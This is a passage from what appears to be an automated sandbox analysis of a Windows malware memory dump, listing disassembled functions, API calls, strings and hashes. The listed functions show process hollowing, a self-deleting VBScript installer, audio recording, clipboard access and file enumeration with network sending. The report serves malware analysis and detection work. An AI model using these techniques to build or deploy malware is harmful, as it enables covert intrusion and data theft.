                          • CloseClipboard.USER32 ref: 0040A671
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$CloseDataOpen
                          • String ID:
                          • API String ID: 2058664381-0
                          • Opcode ID: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                          • Instruction ID: 184f8b84181a4a50bd43ef3289a1c1a9f5b779335cc527adffbe090e77bee848
                          • Opcode Fuzzy Hash: edb8c36ac275bb67b795d66d8e1b797ea5e31e94c4ba3ac6c333071066a6c16d
                          • Instruction Fuzzy Hash: 6CE08C3064432097D2206F60EC08B8A66649B50B12F064A7AB849AB2D1DA75DC208AAE
                          Function 004329DA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                          Download Yara Rule
                          APIs
                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 004329F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FeaturePresentProcessor
                          • String ID:
                          • API String ID: 2325560087-3916222277
                          • Opcode ID: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                          • Instruction ID: 4a1c44cf8a386737ece403ae0cfd22a47b20ce31fd9c2d8f3958115f99bf9d9d
                          • Opcode Fuzzy Hash: 6bf946e24e0cf3f7143bf6f7c2898541fb51292b7eeb3b4358a3a41aa26ebfb9
                          • Instruction Fuzzy Hash: E4514A719002099BDB24CFAAD98579ABBF4FF48314F14846BD815EB350E3B9A910CFA5
                          Function 0044BA59 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: .
                          • API String ID: 0-248832578
                          • Opcode ID: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                          • Instruction ID: 24926096c943187a016d953fe808ce2acf1242cb654f72e39a34338bfc4b4f1c
                          • Opcode Fuzzy Hash: 2bd3453bf6b0042b978c63341e7d52c868cd539d71c5d82670adc25c3f96db7e
                          • Instruction Fuzzy Hash: 0E3108719002486FEB248E79CC84EEB7BBDDB45304F14419EF858D7251EB34EE418B94
                          Function 004068CD Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004068E8
                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 004069B0
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileFind$FirstNextsend
                          • String ID:
                          • API String ID: 4113138495-0
                          • Opcode ID: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                          • Instruction ID: f886cb8170a1cbefaa312452e39d18d6cd017e90ab843946bfd6f4b2f28fefe7
                          • Opcode Fuzzy Hash: e3ef31e205124b2d37ce34f80ed01c56440b36d419931c260197812f3169fbb8
                          • Instruction Fuzzy Hash: 9C218F711043015BC314FBA1DC96CEFB7ACAF91358F400A3EF596621E1EF389A09CA5A
                          Function 0044F4F3 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F547
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$_free$InfoLocale_abort
                          • String ID:
                          • API String ID: 1663032902-0
                          • Opcode ID: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                          • Instruction ID: 815750de5804ab4a8f75770bcc990d44dba9c2967eca50803adc2dd3443e40da
                          • Opcode Fuzzy Hash: ad0e0b7788e936bcfdd9e0a2c8ea1aecabb77b710f5984c66624a7eb150c0fcd
                          • Instruction Fuzzy Hash: 6421B372901206BBEF249F26DC45A7A73A8EB04315F10017BFD01C6242EB78AD59CB59
                          Function 0044F17B Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F2A3,00000001,00000000,?,00441F7E,?,0044F8D0,00000000,?,?,?), ref: 0044F1ED
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                          • Instruction ID: fc4c71b657a69648ba6c32e8c27400de65702582941300ca2eca7bc8fd592fd6
                          • Opcode Fuzzy Hash: 1e67477eb4f1d9c825940ef83573ecb2aed64948dc5e5734fb002b4aa87f20f9
                          • Instruction Fuzzy Hash: D811293B6007019FEB189F39D89167BBB91FF80358B14443DE94647B40D776A946C744
                          Function 0044F723 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044F4C1,00000000,00000000,?), ref: 0044F74F
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$InfoLocale_abort_free
                          • String ID:
                          • API String ID: 2692324296-0
                          • Opcode ID: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                          • Instruction ID: e4b95bc4a5e1061338a04706472302caa06a68982d3ebb8569a44a178f9f49d5
                          • Opcode Fuzzy Hash: c5ca8868f81a5dafb3fdb259ff2b8ec3965b2bfb8aabdce9695f87c3ae70661f
                          • Instruction Fuzzy Hash: 09F02D36600516BBFB245B65DC05BBB7768EF40764F05447AEC19A3240EA7CFD05C6D4
                          Function 0044F216 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F4F3,00000001,?,?,00441F7E,?,0044F894,00441F7E,?,?,?,?,?,00441F7E,?,?), ref: 0044F262
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                          • Instruction ID: 7c38563944de2097393583401858843e6c2e12a799e64e453201a09b71e8bce8
                          • Opcode Fuzzy Hash: d9e72da5ca64d0dbd4f9725887adba7bc59a573407832ad1990d17eaaac4c4d9
                          • Instruction Fuzzy Hash: 44F0223A2007045FEB145F399881A7B7B94FF8036CB15447EF9458B690DAB6AC068614
                          Function 004195F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                          • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                          • Opcode Fuzzy Hash: 8951ed9e5e96f4eef37346a31dc1e1cfc055faec67558bb1b1f4eabc83ab8062
                          • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                          Function 00445914 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00442D9A: EnterCriticalSection.KERNEL32(?,?,004404DB,00000000,0046B4D8,0000000C,00440496,?,?,?,00443038,?,?,004457DA,00000001,00000364), ref: 00442DA9
                          • EnumSystemLocalesW.KERNEL32(004458CE,00000001,0046B680,0000000C), ref: 0044594C
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                          • Instruction ID: 57fcd2d1ba6fdacad71b84952267562ddc6b8062f8818d57533dd41bf3368d71
                          • Opcode Fuzzy Hash: 9f071f7aa8f2d5cfdb4dd86670e259d2fa7dae68b4529c3cbc217272811744e5
                          • Instruction Fuzzy Hash: CFF03C72A10700EFEB00EF69D846B5D77F0EB08325F10402AF400DB2A2DAB989448B5E
                          Function 0044F130 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • EnumSystemLocalesW.KERNEL32(0044F087,00000001,?,?,?,0044F8F2,00441F7E,?,?,?,?,?,00441F7E,?,?,?), ref: 0044F167
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                          • String ID:
                          • API String ID: 1084509184-0
                          • Opcode ID: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                          • Instruction ID: 407cbbfb1d6a14fdc0c4ba4a8479f65f1c0a46e2fba7f2f7bc53bc9e3406d240
                          • Opcode Fuzzy Hash: 27fc750af04bae75093f47f6c8e3f33632e5f31a47d704513601fd173c54c35f
                          • Instruction Fuzzy Hash: 22F05C3930020597DB049F35D845A7ABFA0EFC1754F060069EA058B651C6359C46C754
                          Function 0040E2BB Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00413F34,00471E78,00472910,00471E78,00000000,00471E78,00000000,00471E78,3.8.0 Pro), ref: 0040E2CF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                          • Instruction ID: e43a985d938ffd5d313bbeec62feab64fa47c80c67ee5e1720aa7bcbe65aeca7
                          • Opcode Fuzzy Hash: 856777f14b9a4662401ba442cf494b6ebb80c668ca2d98772b8c18b49fbcc60a
                          • Instruction Fuzzy Hash: 65D05E30B4421C7BEA10D6859C0AEAA7B9CD701B62F0001A6BA08D72D0E9E1AE0487E6
                          Function 004328FC Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                          Download Yara Rule
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(Function_00032908,0043262F), ref: 00432901
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                          • Instruction ID: aee9a4537fe14d989eba5338f3e0e07ed20d0bd3150f914eab3e23255f36ef43
                          • Opcode Fuzzy Hash: 937b0859e2ecbaa4ed0ef4ac8f36e04938c9481000da7c0a06be09f57d080333
                          • Instruction Fuzzy Hash:
                          Function 0041642D Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00416474
                          • GetProcAddress.KERNEL32(00000000), ref: 00416477
                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00416488
                          • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041649C
                          • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004164B0
                          • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00416555
                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041656D
                          • GetThreadContext.KERNEL32(?,00000000), ref: 00416583
                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004165A9
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041662B
                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041663F
                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041667F
                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00416749
                          • SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                          • ResumeThread.KERNEL32(?), ref: 00416773
                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041678A
                          • GetCurrentProcess.KERNEL32(?), ref: 00416795
                          • TerminateProcess.KERNEL32(?,00000000), ref: 004167B0
                          • GetLastError.KERNEL32 ref: 004167B8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                          • API String ID: 4188446516-3035715614
                          • Opcode ID: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                          • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                          • Opcode Fuzzy Hash: 5b7e1e0f0ab70bb274c8e1cba5061de31cdd1b1bc4dd29beedf5b9f83fbb8038
                          • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                          Function 0040B871 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 296fileCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 0040B882
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                          • _wcslen.LIBCMT ref: 0040B968
                          • CopyFileW.KERNEL32(0046FB08,00000000,00000000,00000000), ref: 0040B9E0
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                          • _wcslen.LIBCMT ref: 0040BA25
                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                          • ExitProcess.KERNEL32 ref: 0040BC36
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                          • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                          • API String ID: 2743683619-2376316431
                          • Opcode ID: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                          • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                          • Opcode Fuzzy Hash: 2d8f1c55d0f0c7d88b14490434e7e409f023ec492faccedf176980d1ad0b2fd8
                          • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                          Function 00401A4D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                          • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                          • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                          • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Write$Create
                          • String ID: RIFF$WAVE$data$fmt
                          • API String ID: 1602526932-4212202414
                          • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                          • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                          • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                          • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                          Function 004137DC Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041382B
                          • LoadLibraryA.KERNEL32(?), ref: 0041386D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0041388D
                          • FreeLibrary.KERNEL32(00000000), ref: 00413894
                          • LoadLibraryA.KERNEL32(?), ref: 004138CC
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004138DE
                          • FreeLibrary.KERNEL32(00000000), ref: 004138E5
                          • GetProcAddress.KERNEL32(00000000,?), ref: 004138F4
                          • FreeLibrary.KERNEL32(00000000), ref: 0041390B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                          • String ID: \ws2_32$\wship6$`3A$freeaddrinfo$getaddrinfo$getnameinfo
                          • API String ID: 2490988753-3443138237
                          • Opcode ID: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                          • Instruction ID: d28fd91e0c22c3548fe93de424e57890752fc739e59a71d3c7449bb4191d4936
                          • Opcode Fuzzy Hash: 21b812c9e8c8c8e619d1227956d82128857f9ec353fd6b4c7c84cf26c4fc7a8e
                          • Instruction Fuzzy Hash: 8831C0B2502315ABC720AF25DC489CBBBEC9F48755F41062AF84593251E7B8CE8486AE
                          Function 0044C60D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$EnvironmentVariable$_wcschr
                          • String ID:
                          • API String ID: 3899193279-0
                          • Opcode ID: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                          • Instruction ID: f90cfe9d57a3c7213274ca364bab7ea13f4483d5bd7e80e8c07ab134bc70d503
                          • Opcode Fuzzy Hash: 684045cb82c272c6e2ac36361ff8b964f23035e186c2d5dbd227a350b29f8928
                          • Instruction Fuzzy Hash: 80D136719023007BFB60AF7598C166B7BA4AF15718F09817FF985A7381FB3989008B5D
                          Function 0044E4A6 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0044E4EA
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D6FF
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D711
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D723
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D735
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D747
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D759
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D76B
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D77D
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D78F
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7A1
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7B3
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7C5
                            • Part of subcall function 0044D6E2: _free.LIBCMT ref: 0044D7D7
                          • _free.LIBCMT ref: 0044E4DF
                            • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                            • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                          • _free.LIBCMT ref: 0044E501
                          • _free.LIBCMT ref: 0044E516
                          • _free.LIBCMT ref: 0044E521
                          • _free.LIBCMT ref: 0044E543
                          • _free.LIBCMT ref: 0044E556
                          • _free.LIBCMT ref: 0044E564
                          • _free.LIBCMT ref: 0044E56F
                          • _free.LIBCMT ref: 0044E5A7
                          • _free.LIBCMT ref: 0044E5AE
                          • _free.LIBCMT ref: 0044E5CB
                          • _free.LIBCMT ref: 0044E5E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID: pF
                          • API String ID: 161543041-2973420481
                          • Opcode ID: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                          • Instruction ID: 6e8371ae3b83bc2427c047bff221b97f6cd80994471b0a2caeb41cff5b169df7
                          • Opcode Fuzzy Hash: b166b7e86ef1a7ddfa2e36ec319a6e916c21ca5d81851e2e5517d42b5c42f7b7
                          • Instruction Fuzzy Hash: D4315072500304AFFB205E7AD945B5BB3E5BF00719F55851FE488D6251EE39ED408B18
                          Function 00411899 Relevance: 23.2, APIs: 9, Strings: 4, Instructions: 417sleepfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 004118B2
                            • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                            • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
